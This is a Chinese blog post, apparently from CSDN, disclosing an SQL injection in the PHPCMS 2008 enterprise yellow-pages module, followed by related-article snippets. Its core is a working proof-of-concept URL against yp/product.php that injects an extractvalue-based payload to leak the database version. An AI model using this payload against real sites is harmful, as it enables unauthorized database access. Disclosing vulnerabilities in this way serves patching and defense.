phpcms2008企业黄页模块参数未过滤致SQL注射漏洞

最新推荐文章于 2025-09-12 21:19:01 发布
最新推荐文章于 2025-09-12 21:19:01 发布
阅读量530 收藏
点赞数
分类专栏: CMS 文章标签: sql c
本文披露了phpCMS企业黄页模块中存在的SQL注入漏洞详情,该漏洞允许攻击者执行恶意SQL语句。作者通过示例展示了如何利用此漏洞,并强调了通过审查最新补丁寻找程序漏洞的方法。
phpcms 企业黄页模块由于参数未过滤存在SQL注射 漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦.
 
今天早上还发现别的程序的漏洞,话说以后要找某程序的漏洞,最快的办法就是审计他们最新的补丁.
 
如有转载本站原创文章的,还请保留作者及原文链接.
 
直接上图吧.
http://www.xxxx.com / phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271
 


作者: c4rp3nt3r@0x50sec.org
 
主页: www.0x50sec.org www.cli5.com
PHPCMS2008广告模板SQL注入漏洞修复
10-21
要修复这个漏洞PHPCMS2008的开发者应确保在插入`referer`之前对其进行严格的过滤和验证,例如使用预编译的SQL语句(例如PHP的PDO库)或者参数化查询来防止SQL注入。同时,应定期更新系统以获取最新的安全补丁,...
phpcms2008 企业黄页模块伪静态设置规则分享
09-29
phpcms2008企业黄页模块中,以下是一些关键的伪静态规则: 1. `^(.*)/yp/([a-z]+)-([0-9]+)\.html$`:这条规则用于处理企业黄页的展示页面,例如`www.example.com/yp/公司名称-123.html`。这里的`[a-z]+`代表...
PHPCMS V9 视频分享模块SQL注射漏洞分析
收集盒 Book box
01-03 561
废话不多说了,直接上代码分析          \phpcms\modules\video.php(78行代码) /** * * 视频添加方法 */ public function add() { if ($_POST['dosubmit']) { //首先处理,提交过来的数据 $data['vid']
PHP程序编码规范标准
nanxin35的专栏
04-20 1200
<br />PHP程序编码规范标准 版本号:v2.0 前言 通过建立代码编写规范,形成开发小组编码约定,提高程序的可靠性、可读性、可修改性、可维护性、一致性,保证程序代码的质量,继承软件开发成果,充分利用资源。提高程序的可继承性,使开发人员之间的工作成果可以共享。 建立代码编写规范会有以下优点: 1.程序员可以了解任何代码,弄清程序的状况 2.新人可以很快的适应环境 3.防止新接触php的人出于节省时间的需要,自创一套风格并养成终生的习惯 4.防止新接触php的人一次
PHP程序编码规范
nanxin35的专栏
04-12 956
<br />PHP程序编码规范标准 版本号:v2.0 前言 通过建立代码编写规范,形成开发小组编码约定,提高程序的可靠性、可读性、可修改性、可维护性、一致性,保证程序代码的质量,继承软件开发成果,充分利用资源。提高程序的可继承性,使开发人员之间的工作成果可以共享。 建立代码编写规范会有以下优点: 1.程序员可以了解任何代码,弄清程序的状况 2.新人可以很快的适应环境 3.防止新接触php的人出于节省时间的需要,自创一套风格并养成终生的习惯
[转]信息安全相关理论题(四)
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
[转]信息安全相关理论题(二)
热门推荐
Herry_Lee的专栏
02-18 18万+
27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸 A、 对 B、 错 您的答案: 标准答案: B 28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是 A、 传输层 B、 表示层 C、 会话层 D、 应用层 您的答案: 标准答案: C 29、网络中端口与端口之间连接所用的层是 A、 网络层 B、 表示层 ...
企业黄页_UTF8.zip_monthcbk_phpcms_phpcms企业黄页模块_sortjbc_企业黄页cms
09-24
phpcms企业黄页模块下载,适用utf8版本
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便...
PHPCMS 企业黄页模块 v9 UTF-8 正式版.zip
07-16
PHPCMS V9企业黄页模块正式版更新内容: 新建的模型添加数据时出错 删除冗余文件 后台管理员推送推荐位的bug 后台企业库管理无法搜索的问题 企业黄页卸载出现的bug 修正liunx服务器下,模板解析不兼容问题 ...
PostgreSQL 大对象管理指南:pg_largeobject 从原理到实践
IvorySQL的博客
09-09 331
有时候,你可能需要在 PostgreSQL 中管理大对象,例如 CLOB、BLOB 和 BFILE。PostgreSQL 中有两种处理大对象的方法:一种是使用现有的数据类型,例如用于二进制大对象的 bytea 和用于基于字符的大对象的 text;另一种是使用 pg_largeobject。本文将解释如何使用 pg_largeobject。在本文中,我解释了如何使用 pg_largeobject 来处理 PostgreSQL 中的大对象,并提供了一些非常简单的示例。希望这能有所帮助。
PostgreSQL打印实时查询语句(监控PostgreSQL监控)(成功)
Dontla的博客
09-08 621
定期执行以下 SQL 语句(可通过脚本或。
【好靶场】SQLMap靶场攻防绕过 (一)
HAI_WD的博客
09-10 379
最近遇到很多在做基础靶场的小伙伴们都在SQLMap一把索,那么所幸搞一个SQLMap绕过的靶场。我们是好靶场,一个立志于让所有学习安全的同学用上好靶场的团队。
【PostgreSQL内核学习 —— (SeqScan算子)】
qq_43899283的博客
09-11 517
本文分析了PostgreSQL 18中SeqScan算子的实现,重点解读了ExecInitSeqScan函数的源码。该函数用于初始化顺序扫描算子,主要完成以下工作:创建扫描状态结构体、设置执行上下文、打开扫描关系表、初始化元组槽和投影信息,并编译WHERE条件表达式。通过一个具体的SQL查询示例(SELECT * FROM employees WHERE salary > 50000),详细说明了函数在查询执行过程中如何将静态计划转换为可执行的运行时状态,包括内存分配、计划节点关联、关系表打开等关键步
人大金仓:merge sql error, dbType null, druid-1.2.20
MMF博客园
09-09 303
人大金仓:merge sql error, dbType null, druid-1.2.20
MySQL与PostgreSQL核心区别对比
最新发布
纸上得来终觉浅,绝知此事要躬行
09-12 340
MySQL与PostgreSQL都是主流开源关系型数据库,但各有侧重:MySQL追求简单高效,适合高并发Web应用;PostgreSQL功能丰富,严格遵循SQL标准,支持复杂查询和多种数据类型。关键区别包括:MySQL读写性能优异,PostgreSQL在数据分析、JSON处理等方面更强;MySQL生态成熟,PostgreSQL扩展性更好。现代版本功能逐渐趋同,但设计哲学差异仍在。新项目不确定时可优先考虑PostgreSQL,传统Web项目仍可选用MySQL
Web For Pentester:Sqli Sector
m0_46604997的博客
09-12 428
本文完成了Web For Pentester靶机的Sqli Sector。案例1-3演示了单引号闭合、空格过滤绕过等技术;案例4-7分析了数字型注入及正则过滤的绕过;案例8-9展示了ORDER BY注入的特殊性,其中利用反引号和延时注入获取数据库信息。所有案例均存在过滤用户输入直接拼接SQL语句的问题,导致注入风险。针对这些漏洞,建议采用参数化查询、严格的输入验证、最小权限原则等防御措施。文中还提供了自动化检测脚本,强调了对SQL注入漏洞进行全面检测的重要性。
Postgresql:无人值守升级引发的重启排查
情深深几许
09-10 236
昨天出现了一次PG数据库的重启。
如何解决“You have an error in your SQL syntax“
smddw的博客
09-10 402
当遇到 "You have an error in your SQL syntax" 这类错误时,通常表明 SQL 语句存在语法错误。这类错误通常会给出具体的错误位置和可能的原因。下面是一些详细的解决步骤:注意:如果您是网站访客, 不用理睬。这个属于网站故障, 需要网站管理员处理。如果您是网站管理员, 请检查你的程序和数据库相关设置, 以下方法仅供参考,不同网站存在较大差异。
PHPCMS V9企业黄页模块源代码深度解析
资源摘要信息:"企业黄页模块源代码" 1. PHPCMS V9框架特性 PHPCMS V9是一个使用面向对象(OOP)编程范式构建的网站内容管理系统(CMS)。它的基础运行框架设计注重代码的扩展性、维护性以及二次开发的便利性,使之能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值